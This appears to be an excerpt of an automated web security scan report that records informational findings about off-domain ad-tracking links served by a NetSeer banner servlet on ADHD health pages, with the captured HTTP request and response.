http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADD+Medication&chash=-1457325181303199609&cscr=0.02297675795853138&cpos=7&creg=0&cnads=20&cpc=6.329999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADD+and+ADHD+Symptoms&chash=-4953049157564972247&cscr=0.07769797742366791&cpos=1&creg=0&cnads=12&cpc=5.980000019073486&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.08306773006916046&cpos=8&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Medications&chash=-6864060103493088187&cscr=0.08365996181964874&cpos=4&creg=0&cnads=20&cpc=22.59000015258789&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.34689033031463623&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.16673068702220917&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.13246609270572662&cpos=5&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Hyperactive+Children&chash=-6860052760128524123&cscr=0.030162544921040535&cpos=6&creg=0&cnads=20&cpc=2.7799999713897705&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.0632365271449089&cpos=9&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1

Request

GET /dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Ft%3B242224827%3B0-0%3B1%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd%3Bcontentid%3Db57d2ce1%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadhd%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276208478 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=716199259245381
Cookie: JSESSIONID=A0C9C5A977AB24ABD5D4CA49D185933D.dsat3; netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fc029dfe4ff07fc,1311276179410,"; netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276179412,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvaG93X3RvX3F1aWV0X3RoZV9zeW1wdG9tc19vZl9hZHVsdF9hZGhkLmFzcHg,US-TX-623-Dallas,0,0"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
Set-Cookie: netseer_v3_gi="1005,11065,www.lifescript.com,0,0,1,imp3fea24c3c932bcd7,1311276272777,&1091,992,www.lifescript.com,6,2,1,imp3fd22ffea571c11c,1311276274305,"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:34 GMT; Path=/
Set-Cookie: netseer_v3_vi="2:usre43bc794a5e34d6f:1311276179410"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:34 GMT; Path=/
Set-Cookie: netseer_v3_lvi="2:usre43bc794a5e34d6f:1311276179410,1311276274306,aHR0cDovL3d3dy5saWZlc2NyaXB0LmNvbS9oZWFsdGgvY29uZGl0aW9ucy9hZGQvb3V0X29mX2NvbnRyb2xfaXRfY291bGRfYmVfYWRoZC5hc3B4,US-TX-623-Dallas,6,2"; Version=1; Domain=.netseer.com; Max-Age=31536000; Expires=Fri, 20-Jul-2012 19:24:34 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:24:34 GMT
Content-Length: 12195

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

   <script>
function submitsearch() {
   var searchbox = document.getElementById('search_box'
...[SNIP]...
<td id="cpts_c_p1_r1_c1">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADD+and+ADHD+Symptoms&chash=-4953049157564972247&cscr=0.07769797742366791&cpos=1&creg=0&cnads=12&cpc=5.980000019073486&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p1_r1_c1">
                                       ADD and ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p2_r1_c2">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.34689033031463623&cpos=2&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p2_r1_c2">
                                       ADHD Symptoms
                                       </a>
...[SNIP]...
<td id="cpts_c_p3_r1_c3">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.16673068702220917&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p3_r1_c3">
                                       ADHD Treatment
                                       </a>
...[SNIP]...
<td id="cpts_c_p4_r2_c4">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Medications&chash=-6864060103493088187&cscr=0.08365996181964874&cpos=4&creg=0&cnads=20&cpc=22.59000015258789&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p4_r2_c4">
                                       ADHD Medications
                                       </a>
...[SNIP]...
<td id="cpts_c_p5_r2_c5">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.13246609270572662&cpos=5&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p5_r2_c5">
                                       ADHD in Adults
                                       </a>
...[SNIP]...
<td id="cpts_c_p6_r2_c6">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Hyperactive+Children&chash=-6860052760128524123&cscr=0.030162544921040535&cpos=6&creg=0&cnads=20&cpc=2.7799999713897705&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p6_r2_c6">
                                       Hyperactive Children
                                       </a>
...[SNIP]...
<td id="cpts_c_p7_r3_c7">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADD+Medication&chash=-1457325181303199609&cscr=0.02297675795853138&cpos=7&creg=0&cnads=20&cpc=6.329999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p7_r3_c7">
                                       ADD Medication
                                       </a>
...[SNIP]...
<td id="cpts_c_p8_r3_c8">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=ADHD+Information&chash=-1138865117210305592&cscr=0.08306773006916046&cpos=8&creg=0&cnads=20&cpc=4.010000228881836&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p8_r3_c8">
                                       ADHD Information
                                       </a>
...[SNIP]...
<td id="cpts_c_p9_r3_c9">
                                       <a rel="nofollow" target="_blank"    href="http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/t;242224827;0-0;1;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/out_of_control_it_could_be_adhd;contentid=b57d2ce1;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adhd;tax=adult_adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fd22ffea571c11c&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fout_of_control_it_could_be_adhd.aspx&cvis=Hyperactivity+Disorder&chash=6235014368733547065&cscr=0.0632365271449089&cpos=9&creg=0&cnads=13&cpc=4.139999866485596&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1" id="cpts_p9_r3_c9">
                                       Hyperactivity Disorder
                                       </a>
...[SNIP]...

18.56. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://contextlinks.netseer.com
Path:	/dsatserving2/servlet/BannerServer

Issue detail

The page was loaded from a URL containing a query string:

http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer?tagid=1477&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&impt=6&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fd%3B240321491%3B0-0%3B3%3B31210306%3B3454-728%2F90%3B37820391%2F37838239%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd%3Bcontentid%3Dfbca8610%3Bdcopt%3Dist%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Btax%3Dadhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3B~sscs%3D%3F&rfd=www.lifescript.com&imps=2&adh=90&adw=728&frd=1311276277166

The response contains the following links to other domains:

http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADD+and+ADHD+Information&chash=3660505418659665001&cscr=0.07337363809347153&cpos=6&creg=0&cnads=20&cpc=7.940000057220459&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Help&chash=-741781366439515232&cscr=0.03321396932005882&cpos=7&creg=0&cnads=20&cpc=5.079999923706055&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Symptoms&chash=-2800933116753393016&cscr=0.18060718476772308&cpos=1&creg=0&cnads=20&cpc=16.850000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+Treatment&chash=5221125999175341271&cscr=0.14492054283618927&cpos=3&creg=0&cnads=20&cpc=13.550000190734863&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=ADHD+in+Adults&chash=-8728120276980351463&cscr=0.11105802655220032&cpos=4&creg=0&cnads=20&cpc=12.100000381469727&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Anxiety+Attacks&chash=-8189732505136611516&cscr=0.022995220497250557&cpos=8&creg=0&cnads=20&cpc=2.680000066757202&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Child+with+ADHD&chash=3007873813482410363&cscr=0.03458286076784134&cpos=5&creg=0&cnads=20&cpc=3.740000009536743&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
http://ad.doubleclick.net/click;h=v8/3b4b/3/0/*/d;240321491;0-0;3;31210306;3454-728/90;37820391/37838239/1;;~okv=;path=health/conditions/add/doctor-recommended_tips_for_women_with_adhd;contentid=fbca8610;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;tax=adhd;camp=adhd;camp=adhd_adult;~sscs=?http://contextlinks.netseer.com/contextlinks2/servlet/clickforward?tlid=992&iid=imp3fe36fdfba28bf14&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fdoctor-recommended_tips_for_women_with_adhd.aspx&cvis=Disorder+Treatment&chash=-757757160123027445&cscr=0.009844579733908176&cpos=9&creg=0&cnads=20&cpc=0.8100000023841858&rmode=1&vid=usre43bc794a5e34d6f&qtype=c&sidx=0&advs=0&geo=US-TX-623-Dallas&impt=6&imps=2&cltp=1
